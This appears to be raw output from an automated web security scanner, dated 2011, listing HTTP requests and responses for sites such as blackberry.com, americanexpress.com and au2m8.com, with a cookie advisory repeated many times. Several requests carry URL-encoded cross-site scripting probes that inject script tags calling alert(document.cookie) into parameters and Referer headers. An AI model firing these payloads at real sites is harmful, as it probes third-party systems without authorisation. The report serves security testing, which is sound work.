GET /assets_refresh/images/dropNavArrow.png?01AD=35Q54e83kMijy_nk89V0lFAxrY6VDtbVadHWdB3h9L8A2uRr36LQVVw&01RI=28F5F496E208D76&01NA= HTTP/1.1 Host: us.blackberry.com Proxy-Connection: keep-alive Referer: http://us.blackberry.com/smartphones/94178%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed0d62204af5/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fsr.a=1296999181981; s_cc=true; dfa_cookie=rimglobal%2Crimbbus; s_sq=%5B%5BB%5D%5D; s_sv_sid=641990084704; BLLY=CT-1
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Last-Modified: Thu, 03 Feb 2011 21:57:47 GMT ETag: "1b28800-239-db1eacc0" Accept-Ranges: bytes Content-Length: 569 Content-Type: image/png Date: Sun, 06 Feb 2011 13:32:26 GMT Connection: close Set-Cookie: BLLY=35Q54e83kMijy_nk89V0lFAxrY6VDtbVadHWdB3h9L8A2uRr36LQVVw; expires=Sun, 06-Mar-2011 13:32:26 GMT; path=/; domain=.blackberry.com P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /od/soupsstewsandchili/r/hotandsour.htm HTTP/1.1 Host: vegetarian.about.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><!--DVID=000022CC--><html lang="en"><head><meta http-equiv="X-UA-Compatible" content="chrome=1"><m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /werbemittel/WebObjects/werbemittel.woa/wa/ads?apid=6f09cd3d-7986-4113-9124-912c77e974a9&zanpid=11259592C1875273789S14786739T1469378460983287808&zanpartner=1049301 HTTP/1.1 Host: www.active-srv02.de Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU5MkMxODc1MjczNzg5UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Server: nginx/0.6.32 Date: Sun, 06 Feb 2011 17:05:24 GMT Content-Type: text/html;charset=UTF-8 Connection: close location: http://dslshop.vodafone.de/eshop/pv/97444194?tsID=za1049301 set-cookie: apv_1=6f09cd3d-7986-4113-9124-912c77e974a9|za|tsID=za1049301; version="1"; expires=Thu, 07-Apr-2011 17:05:24 GMT; path=/; domain=.active-srv02.de x-webobjects-loadaverage: 0 x-webobjects-servlet: YES Content-Length: 0 P3P: CP="NOI DSP COR CUR OUR STP NAV STA"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /airlines-credit-card/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit-card-rewards/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gift/giftcardslanding.shtml HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:52:57 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296942777855214; path=/; expires=Tue, 09-Feb-16 21:52:57 GMT; domain=.americanexpress.com Accept-Ranges: bytes Cache-Control: max-age=-485925 Expires: Mon, 31 Jan 2011 06:54:12 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 64996
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gold-card/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /no-annual-fee-credit-cards/?source=footer_noannual_credit_cards HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=26263692aa%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E395e61b488b&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&jr=1&jr=2&jr=3 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://www.au2m8.com/v/?ps=26&cw=26263692aa%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E395e61b488b&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&jr=1&jr=2 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryID=us; bpl1297002238=1296998638; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1297002287=1296998687; videoID=expired; auto=expired; playlist=5731%2C4881; j2playlist=4881
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=47379&pID=11909&skinName=light&t=938777&pr=www.kledy.co.uk%2F&psource=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://files.video-loader.com/au2m8_preloader/37211909126091178247379.htm?vs=1&r=www.kledy.co.uk%2F&s=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1&t=862030 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryID=us; playlist=5731%2C4881; j2playlist=4881
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=47379&pID=11909&skinName=light&t=484711&pr=www.kledy.co.uk%2F&psource=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://files.video-loader.com/au2m8_preloader/37211909126091178247379.htm?vs=1&r=www.kledy.co.uk%2F&s=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1&t=271024 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1297012232=1297008632; videoID=expired; auto=expired; playlist=5731%2C4881; j2playlist=5731
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/ HTTP/1.1 Host: www.au2m8.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bpl1296950982=1296947382; countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1296950951=1296947351; bpl1296950905=1296947305; bpl1297002333=1296998733; bpl1296950890=1296947290; bpl1296950921=1296947321; bpl1297002238=1296998638; bpl1297002318=1296998718; videoID=expired; bpl1297002302=1296998702; bpl1297002287=1296998687; bpl1296950936=1296947336; j2playlist=4881; auto=expired; bpl1296950967=1296947367; playlist=5731%2C4881; bpl1297002348=1296998748;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/ HTTP/1.1 Host: www.au2m8.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bpl1296950982=1296947382; countryID=us; ARPT=NQJKKYS192.168.100.218CKOWJ; bpl1296950951=1296947351; bpl1296950905=1296947305; bpl1296950890=1296947290; bpl1296950921=1296947321; videoID=expired; bpl1296950936=1296947336; j2playlist=5731; auto=expired; bpl1296950967=1296947367; playlist=5731;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=47379&pID=11909&skinName=light&t=484711&pr=www.kledy.co.uk%2F&psource=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1&jr=1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://www.au2m8.com/v/?ps=26&cw=47379&pID=11909&skinName=light&t=484711&pr=www.kledy.co.uk%2F&psource=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1297012232=1297008632; bpl1297012271=1297008671; videoID=expired; auto=expired; playlist=5731%2C4881; j2playlist=5731
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=47379&pID=11909&skinName=light&t=484711&pr=www.kledy.co.uk%2F&psource=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1&jr=1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://www.au2m8.com/v/?ps=26&cw=47379&pID=11909&skinName=light&t=484711&pr=www.kledy.co.uk%2F&psource=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1297012232=1297008632; bpl1297012271=1297008671; videoID=expired; auto=expired; playlist=5731%2C4881; j2playlist=5731
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=26263692aa%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E395e61b488b&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&jr=1&jr=2 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://www.au2m8.com/v/?ps=26&cw=26263692aa%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E395e61b488b&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&jr=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryID=us; bpl1297002238=1296998638; videoID=expired; auto=expired; playlist=5731; j2playlist=4881; ARPT=NQJKKYS192.168.100.219CKOWU
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=47379&pID=11909&skinName=light&t=484711&pr=www.kledy.co.uk%2F&psource=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://files.video-loader.com/au2m8_preloader/37211909126091178247379.htm?vs=1&r=www.kledy.co.uk%2F&s=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1&t=271024 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1297012232=1297008632; videoID=expired; auto=expired; playlist=5731%2C4881; j2playlist=5731
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=26263&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&jr=1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://www.au2m8.com/v/?ps=26&cw=26263&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=NQJKKYS192.168.100.218CKOWJ; countryID=us; bpl1296950890=1296947290; videoID=expired; auto=expired; j2playlist=5731
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=26263&pID=11909&skinName=light&t=685356&pr=www.kledy.de%2Fbookmarks.php&psource=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://files.video-loader.com/au2m8_preloader/81211909126097148926263.htm?vs=1&r=www.kledy.de%2Fbookmarks.php&s=www.kledy.de%2Fbookmarks.php&poR=http%3A%2F%2Fburp%2Fshow%2F34&poS=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eef67307aec5%3D1&t=76345 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v/?ps=26&cw=47379&pID=11909&skinName=light&t=938777&pr=www.kledy.co.uk%2F&psource=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1 HTTP/1.1 Host: www.au2m8.com Proxy-Connection: keep-alive Referer: http://files.video-loader.com/au2m8_preloader/37211909126091178247379.htm?vs=1&r=www.kledy.co.uk%2F&s=www.kledy.co.uk%2F&poR=http%3A%2F%2Fburp%2Fshow%2F64&poS=http%3A%2F%2Fwww.kledy.co.uk%2F%3Fb6885%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E58b3310da99%3D1&t=862030 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryID=us; playlist=5731%2C4881; j2playlist=4881
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
